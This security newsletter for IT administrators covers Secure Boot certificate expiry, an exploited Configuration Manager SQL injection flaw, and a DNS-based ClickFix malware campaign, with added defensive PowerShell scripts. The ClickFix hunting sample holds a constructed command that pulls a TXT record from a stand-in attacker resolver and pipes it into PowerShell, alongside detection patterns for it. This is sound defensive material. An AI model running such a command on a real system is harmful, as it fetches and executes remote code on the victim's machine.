Windows Secure Boot certificate updates

The big picture: Microsoft is replacing the "Secure Boot" certificates that protect your PC during the earliest stage of startup. The original certificates from 2011 begin expiring in June 2026. Devices that still rely on them after that point stop receiving Secure Boot security updates, which leaves them exposed to attackers who target the boot process.

Why it matters: Secure Boot is like a digital bouncer. It ensures only trusted software can run before your Windows operating system loads. If these certificates expire:

  • Security gaps: Your PC stops receiving new boot-time defenses, such as updated boot managers and revocations for known-bad bootloaders, which is exactly what keeps "bootkits" and "rootkits" out.

  • Update failures: Future updates to boot components, and hardware or drivers signed only with the new certificates, may fail to install or fail to be trusted at boot.

  • Risk over time: Your devices enter what Microsoft calls a "degraded security state," making them easier targets for sophisticated attacks the longer they stay there.

The action plan: Most small businesses can handle this easily through regular maintenance.

  • Install Windows updates: Most PCs will get the new certificates automatically through monthly Windows updates.

  • Check firmware: Some devices need a UEFI firmware (BIOS) update from the manufacturer (Dell, HP, Lenovo and so on) before Windows can write the new certificates, because the firmware has to accept the update of its key databases.

  • Do not disable Secure Boot to bypass errors; this leaves your network wide open to startup malware.

What stays the same: Your computers will not stop working on the expiration date. They will still boot up, and your apps will run. However, they will lack the latest protection against new threats.
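
A quick way to see where a given machine stands, as an added example (this is not Microsoft's script and not from the newsletter). It uses the built-in SecureBoot module and reads the servicing status value Microsoft documents for the 2023 CA rollout; that value may be absent on builds that have not started the rollout, so it is read with -ErrorAction SilentlyContinue:

```powershell
# Added example (not from the newsletter, not Microsoft's tooling): report whether this device has
# the 2023 Secure Boot certificates. Run in an elevated PowerShell on the device itself.

function Get-SecureBootCertStatus {
    try   { $enabled = Confirm-SecureBootUEFI }   # throws on legacy BIOS / CSM boot
    catch { $enabled = $false }
    if (-not $enabled) {
        return [pscustomobject]@{ SecureBootEnabled = $false; Verdict = 'Secure Boot is off or unsupported: fix this first' }
    }

    # KEK and db are EFI signature lists holding DER certificates. The CA names are plain ASCII inside
    # the DER, so a substring match on the decoded bytes is enough to tell which CAs are enrolled.
    $kek = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name KEK).Bytes)
    $db  = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name db).Bytes)

    # Rollout status written by Windows servicing (assumed absent on devices that have not started)
    $servicing = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecureBoot\Servicing' -ErrorAction SilentlyContinue

    $kek2023  = $kek -match 'Microsoft Corporation KEK 2K CA 2023'
    $win2023  = $db  -match 'Windows UEFI CA 2023'                 # signs the Windows boot manager
    $uefi2023 = $db  -match 'Microsoft UEFI CA 2023'               # signs third-party boot loaders and drivers
    $pca2011  = $db  -match 'Microsoft Windows Production PCA 2011' # the expiring 2011 CA

    $verdict = if ($kek2023 -and $win2023 -and $uefi2023) {
                   'Updated: 2023 certificates present'
               } elseif ($kek2023 -or $win2023 -or $uefi2023) {
                   'In progress: some 2023 certificates missing; check for pending reboots and updates'
               } else {
                   'Not started: install current updates; if this persists, the OEM firmware likely needs updating'
               }

    [pscustomobject]@{
        SecureBootEnabled = $true
        KEK2023           = $kek2023
        DbWindows2023     = $win2023
        DbThirdParty2023  = $uefi2023
        DbPCA2011Present  = $pca2011      # expected to remain until Microsoft revokes it
        ServicingStatus   = $servicing.UEFICA2023Status
        Verdict           = $verdict
    }
}

Get-SecureBootCertStatus | Format-List
```

For a fleet, wrap the call in Invoke-Command against your machine list and sort by Verdict. Machines that stay at "Not started" after the monthly updates have been installed and rebooted are the ones to check for a pending OEM firmware update.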

Old SCCM vulnerability being exploited, says CISA

The big picture: The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-43468 to its Known Exploited Vulnerabilities (KEV) catalog. That listing means attackers are using the flaw against real organizations, and US federal agencies are now required to patch it by a deadline.

Why it matters: Hackers are exploiting a critical flaw in Microsoft Configuration Manager (formerly SCCM). If you use this tool to manage your Windows servers and workstations, a compromised site server is a path to every machine it manages, because the product exists to push software and scripts to them.

How it works

  • The flaw: It is a "SQL injection" vulnerability reachable over the network, rated critical (CVSS 9.8).

  • The risk: An attacker does not need a username or password. A specially crafted request to the server is enough to execute commands on the server and its database.

  • The angle: Because Configuration Manager runs with high privileges and can deploy software to every managed client, taking it over means taking over the servers and databases behind it, and potentially every endpoint it manages.

Yes, but: Unless your Configuration Manager site is exposed to the Internet (it should not be), the attacker first needs a foothold on your internal network. Still patch immediately, but you are not facing mass scanning from the Internet. Keep in mind that management points are reachable from every client subnet by design, so one phished workstation or an infected contractor laptop is enough of a foothold.

What you should do

Microsoft released the fix in October 2024 and initially rated the flaw as "exploitation less likely." Researchers later published a detailed write-up and proof-of-concept code showing exactly how to exploit it, which is the usual prelude to real attacks.

  1. Check your version: Microsoft's advisory lists Configuration Manager 2303, 2309 and 2403 as affected. If you patch regularly, the answer should already be no.

  2. Update immediately: If you are on an affected version, install the security update Microsoft provides for CVE-2024-43468. It ships as an in-console update (Administration > Updates and Servicing), not through Windows Update, so a fully patched operating system says nothing about this flaw. (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468)
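
To take the guesswork out of step 1, here is an added example (not from the newsletter and not Microsoft's tooling) that classifies a site server by branch. It assumes the "Full Version" value under HKLM:\SOFTWARE\Microsoft\SMS\Setup holds the site version, as it does on site servers, and its build-to-branch table is the public one, which you should check against Microsoft's version list before relying on it. The hotfix does not change the branch, so an "affected branch" result means you still have to confirm the update is installed in the console:

```powershell
# Added example (not from the newsletter, not Microsoft's tooling): classify a Configuration Manager
# site server against the branches Microsoft lists for CVE-2024-43468 (2303, 2309, 2403).
# Assumption: build-to-branch mapping below matches Microsoft's published version list.

$BuildToBranch    = @{ 9106 = '2303'; 9122 = '2309'; 9128 = '2403'; 9132 = '2409' }
$AffectedBranches = '2303', '2309', '2403'

function Get-CMBranchStatus {
    param([string]$FullVersion)   # e.g. '5.00.9128.1000'; leave empty to read the local site server's registry
    if (-not $FullVersion) {
        $FullVersion = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\SMS\Setup' -ErrorAction Stop).'Full Version'
    }
    $build  = [int](($FullVersion -split '\.')[2])   # third field is the branch build number
    $branch = $BuildToBranch[$build]

    if ($build -lt 9106) {
        # Branches older than 2303 were out of support when the fix shipped and received no update
        $status = 'Out of support: no fix was issued for this branch; assume affected and upgrade'
    } elseif ($branch -and ($branch -in $AffectedBranches)) {
        $status = "Affected branch $branch: confirm the CVE-2024-43468 update is installed under Updates and Servicing"
    } elseif ($branch) {
        $status = "Branch $branch is not in Microsoft's affected list for this CVE"
    } else {
        $status = 'Unknown build: check it against Microsoft''s version list'
    }

    [pscustomobject]@{ FullVersion = $FullVersion; Build = $build; Branch = $branch; Status = $status }
}

# Constructed inputs for a dry run on any machine (no site server needed):
Get-CMBranchStatus -FullVersion '5.00.9128.1000'   # a 2403 site
Get-CMBranchStatus -FullVersion '5.00.9096.1000'   # a 2211 site, out of support
# On the site server itself, simply run: Get-CMBranchStatus
```

If you prefer the console, Get-CMSite from the ConfigurationManager module returns the same version string in its Version property and can be fed to the function instead of the registry read.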

Security Alert: New "ClickFix" attack uses DNS to bypass defenses

The big picture: Hackers are using a new version of the "ClickFix" attack. This time, they trick users into running a simple network command to bypass security tools and install a remote access trojan (RAT).

How it works: ClickFix attacks usually trick people into thinking their computer has an error. The user is told to copy and paste a command to "fix" it.

  • The new twist: Instead of downloading a file from a website, the command runs nslookup, the standard Windows DNS lookup tool.

  • The payload: The command asks a hacker-controlled DNS server for a record. The server answers with a malicious PowerShell script carried inside the DNS response (typically a TXT record), and the pasted command feeds that text straight into PowerShell.

  • The result: The script installs "ModeloRAT," which gives hackers full control of the device.
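
Because every step above leaves a process-creation trail, the pattern is easy to hunt for. The following is an added example (not from the newsletter and not a vendor detection) that scans process-creation records shaped like Sysmon Event ID 1 (Image, ParentImage, CommandLine, UtcTime). The sample records are constructed; the domain names use the reserved .test suffix, 198.51.100.7 (a TEST-NET-2 address) stands in for the attacker's resolver, and 10.0.0.10 is assumed to be the organization's own resolver:

```powershell
# Added example (not from the newsletter): hunt process-creation records for the ClickFix-over-DNS shape.
# Sample records are CONSTRUCTED. Field names follow Sysmon Event ID 1.

$SampleEvents = @(
    [pscustomobject]@{ UtcTime = '2026-02-03 14:07:11'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell -w hidden -c "iex (nslookup -type=txt verify.example.test 198.51.100.7 | Select-String TXT)"' }
    [pscustomobject]@{ UtcTime = '2026-02-03 14:07:12'; Image = 'C:\Windows\System32\nslookup.exe'
                       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'nslookup -type=txt verify.example.test 198.51.100.7' }
    [pscustomobject]@{ UtcTime = '2026-02-03 09:14:02'; Image = 'C:\Windows\System32\nslookup.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'nslookup -type=txt _dmarc.example.test 10.0.0.10' }   # admin checking DMARC: benign
    [pscustomobject]@{ UtcTime = '2026-02-03 09:20:45'; Image = 'C:\Windows\System32\nslookup.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'nslookup -type=mx example.test' }                     # benign
)

function Find-ClickFixDns {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [string[]]$AuthorizedResolvers = @()
    )
    $txtQuery  = '(^|\s)-(q|query|querytype|type)=txt(\s|$)'                # nslookup's TXT-record switches
    $execChain = 'iex|invoke-expression|for\s+/f|\|\s*(powershell|pwsh|cmd)' # lookup output fed to an interpreter
    $shellExe  = 'powershell\.exe$|pwsh\.exe$|cmd\.exe$'

    foreach ($e in $Events) {
        $cl = [string]$e.CommandLine
        $reasons = New-Object System.Collections.Generic.List[string]

        # 1. One pasted command line that both fetches a TXT record and executes whatever comes back
        if ($cl -match 'nslookup' -and $cl -match $txtQuery -and $cl -match $execChain) {
            $reasons.Add('TXT lookup chained into command execution')
        }
        # 2. A shell started from Explorer (the Run dialog) with nslookup on its command line
        if ($e.Image -match $shellExe -and $e.ParentImage -match 'explorer\.exe$' -and $cl -match 'nslookup') {
            $reasons.Add('shell launched from Explorer/Run dialog with nslookup')
        }
        # 3. nslookup.exe itself asking a server that is not one of ours: nslookup <name> <server>
        if ($e.Image -match 'nslookup\.exe$' -and $cl -match $txtQuery) {
            $positional = @(($cl -split '\s+') | Where-Object { $_ -and $_ -notlike '-*' })
            if ($positional.Count -ge 3) {
                $server = $positional[-1]
                if ($server -match '^\d{1,3}(\.\d{1,3}){3}$' -and $server -notin $AuthorizedResolvers) {
                    $reasons.Add("TXT query sent directly to unauthorised resolver $server")
                }
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ UtcTime = $e.UtcTime; Image = $e.Image; Reasons = ($reasons -join '; '); CommandLine = $cl }
        }
    }
}

Find-ClickFixDns -Events $SampleEvents -AuthorizedResolvers '10.0.0.10' | Format-Table -AutoSize -Wrap
```

On a real host, pull the records with Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}, map the Image, ParentImage and CommandLine fields from each event's XML into the same shape, and feed them to the function. The third check is the noisiest in environments where admins query public resolvers by hand, so tune the authorized list before alerting on it.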

Why it matters: Most security software watches for suspicious web downloads (HTTP). However, many tools do not monitor DNS traffic as closely. By hiding the attack in a DNS lookup, hackers can:

  1. Evade detection: A DNS lookup by a built-in Windows tool looks like ordinary network traffic, and no file is downloaded from the web for a proxy or antivirus to inspect.

  2. Change tactics quickly: Hackers can update the malicious script on their server instantly without changing the link the user clicks.

What you can do: As an IT professional, you are the first line of defense for your team.

  • Educate users: Remind employees that legitimate support (like Microsoft or Google) will never ask them to run commands from a "Run" dialog box or PowerShell to fix a browser error.

  • Restrict permissions: Use the principle of least privilege. Without local admin rights the script cannot install system-wide persistence or tamper with security tools, which limits the damage. Note that a RAT can still run happily inside a standard user's profile, so this is a brake, not a block.

  • Monitor DNS: Use DNS filtering or logging (Sysmon Event ID 22 on endpoints, or your resolver's query logs) to spot TXT lookups for unknown domains and queries sent directly to external IP addresses.

  • Restrict DNS servers: On your local network, restrict which DNS servers your clients can talk to. Windows Firewall rules delivered by Group Policy Objects (GPOs) can block outgoing TCP and UDP traffic on port 53 to everything except your authorized DNS server IPs.
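
The last bullet has a trap worth showing. Windows Defender Firewall evaluates explicit Block rules before Allow rules, so the obvious pair "block port 53 to Any" plus "allow port 53 to our resolvers" blocks the resolvers too. The added example below (not from the newsletter) works around that by building a Block rule that lists every IPv4 range except the authorized resolvers. The resolver addresses 10.0.0.10 and 10.0.0.11 are placeholders, and the GPO policy store name is an assumption you would replace with your own:

```powershell
# Added example (not from the newsletter): DNS egress rules for Windows clients with New-NetFirewallRule.
# Caveat handled here: an explicit Block rule overrides an Allow rule, so the Block rule must exclude
# the authorised resolvers itself instead of relying on a separate Allow rule.

$AuthorizedDns = @('10.0.0.10', '10.0.0.11')   # placeholder resolver addresses

function ConvertTo-IPv4Number {
    param([Parameter(Mandatory)][string]$Ip)
    $b = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()   # network byte order (big-endian)
    [Array]::Reverse($b)                                        # BitConverter expects host order on x86/x64
    [BitConverter]::ToUInt32($b, 0)
}

function ConvertFrom-IPv4Number {
    param([Parameter(Mandatory)][uint32]$Number)
    $b = [BitConverter]::GetBytes($Number)
    [Array]::Reverse($b)
    [System.Net.IPAddress]::new($b).ToString()
}

function Get-IPv4RangesExcluding {
    # Returns "start-end" strings covering 1.0.0.0-255.255.255.255 minus the given hosts.
    # 0.0.0.0/8 is not routable, so leaving it out of the block list is harmless.
    param([Parameter(Mandatory)][string[]]$Exclude)
    $ranges = New-Object System.Collections.Generic.List[string]
    [uint64]$next = ConvertTo-IPv4Number '1.0.0.0'
    foreach ($n in ($Exclude | ForEach-Object { ConvertTo-IPv4Number $_ } | Sort-Object -Unique)) {
        if ([uint64]$n -gt $next) {
            $ranges.Add(('{0}-{1}' -f (ConvertFrom-IPv4Number ([uint32]$next)), (ConvertFrom-IPv4Number ([uint32]($n - 1)))))
        }
        if ([uint64]$n -ge $next) { $next = [uint64]$n + 1 }
    }
    if ($next -le [uint32]::MaxValue) {
        $ranges.Add(('{0}-255.255.255.255' -f (ConvertFrom-IPv4Number ([uint32]$next))))
    }
    return $ranges.ToArray()
}

function Set-DnsEgressRules {
    # PolicyStore 'PersistentStore' writes to the local firewall; use 'domain.example\DNS Egress GPO'
    # (an assumed name) to write the same rules into a Group Policy Object instead.
    param([string[]]$Resolvers = $AuthorizedDns, [string]$PolicyStore = 'PersistentStore')
    $blocked = Get-IPv4RangesExcluding -Exclude $Resolvers
    foreach ($proto in 'UDP', 'TCP') {
        # Allow rule only matters on hosts whose outbound default action is Block
        New-NetFirewallRule -PolicyStore $PolicyStore -DisplayName "DNS egress: allow authorised resolvers ($proto)" `
            -Direction Outbound -Protocol $proto -RemotePort 53 -RemoteAddress $Resolvers -Action Allow | Out-Null
        # Block rule carries the complement of the resolver list, so it never matches the resolvers
        New-NetFirewallRule -PolicyStore $PolicyStore -DisplayName "DNS egress: block all other resolvers ($proto)" `
            -Direction Outbound -Protocol $proto -RemotePort 53 -RemoteAddress $blocked -Action Block | Out-Null
    }
}

# Review the ranges first; with the two placeholder resolvers this yields
# 1.0.0.0-10.0.0.9 and 10.0.0.12-255.255.255.255
Get-IPv4RangesExcluding -Exclude $AuthorizedDns
# Then, from an elevated prompt: Set-DnsEgressRules
```

Two limits to keep in mind. Port 53 rules do nothing against DNS over HTTPS or DNS over TLS (ports 443 and 853), and they do not stop a TXT record that is resolvable through your own resolver, which is how most of these campaigns work; that case is what the DNS filtering and monitoring bullet is for. For laptops that roam, the DNS keyword in -RemoteAddress resolves to whatever resolvers each adapter currently has, which is convenient for the Allow rule but still leaves the Block rule needing explicit ranges.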

If you have any comments or feedback, just respond to this email!

Thanks for reading and stay secure,

Aaron